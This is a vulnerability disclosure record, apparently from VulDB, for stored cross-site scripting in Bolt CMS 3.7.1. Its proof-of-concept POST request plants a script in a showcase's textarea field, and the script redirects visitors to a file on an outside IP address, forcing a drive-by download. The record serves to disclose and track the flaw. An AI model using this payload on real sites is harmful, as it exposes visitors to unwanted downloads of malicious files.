| Titre | Bolt Bolt CMS 3.7.1 XSS + drive-by download |
|---|
| Description | In Bolt CMS 3.7.1, an authenticated user can insert a malicious script into the <textarea> field when creating a showcase. This script can facilitate the download of malicious files without the consent of users who access the page.
## PoC
--- Request ---
POST /bolt/editcontent/showcases HTTP/1.1
Host: 10.10.22.5:8000
content_edit%5B_token%5D=6c77j8NxXJ5Q8bQsFkUnb801F2M_UbzMn3rKtPqeOBI&editreferrer=&contenttype=showcases&title=Test+Page+1&slug=test-page-1&html=%3Cp%3ETest+page%2C+malicios%3C%2Fp%3E%0D%0A&textarea=%3Cscript%3E%0D%0Awindow.location+%3D+%27http%3A%2F%2F10.8.140.71%3A%2Fteste-example.txt%27%3B%0D%0A%3C%2Fscript%3E%0D%0A&markdown=&geolocation%5Baddress%5D=&geolocation%5Blatitude%5D=&geolocation%5Blongitude%5D=&geolocation%5Bformatted_address%5D=&embed%5Burl%5D=&embed%5Bwidth%5D=&embed%5Bheight%5D=&embed%5Bprovider_name%5D=&embed%5Bauthor_name%5D=&embed%5Bauthor_url%5D=&embed%5Bhtml%5D=&embed%5Bthumbnail%5D=&video%5Burl%5D=&video%5Bwidth%5D=&video%5Bheight%5D=&video%5Btitle%5D=&video%5Bauthorname%5D=&video%5Bratio%5D=&video%5Bauthorurl%5D=&video%5Bhtml%5D=&video%5Bthumbnail%5D=&image%5Bfile%5D=&image%5Btitle%5D=&files%5B%5D=&files%5B%5D=&imagelist=%5B%5D&file=&files%5B%5D=&files%5B%5D=&filelist=%5B%5D&datetime=2000-01-01+00%3A00%3A00&date=2024-06-01&integerfield=0&floatfield=0&selectfield=&selectentry=&repeater%5B%5D=&repeater%5B0%5D%5Brepeattitle%5D=&repeater%5B0%5D%5Brepeatimage%5D%5Bfile%5D=&files%5B%5D=&repeater%5B0%5D%5Brepeatcontent%5D=&relation%5Bentries%5D%5B%5D=&id=&status=published&datepublish=2024-07-26+13%3A48%3A04&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1 |
|---|
| Utilisateur | xMirandax (UID 72454) |
|---|
| Soumission | 26/07/2024 16:15 (il y a 2 ans) |
|---|
| Modérer | 30/07/2024 17:33 (4 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 273168 [Bolt CMS 3.7.1 Showcase Creation showcases title/textarea cross site scripting] |
|---|
| Points | 17 |
|---|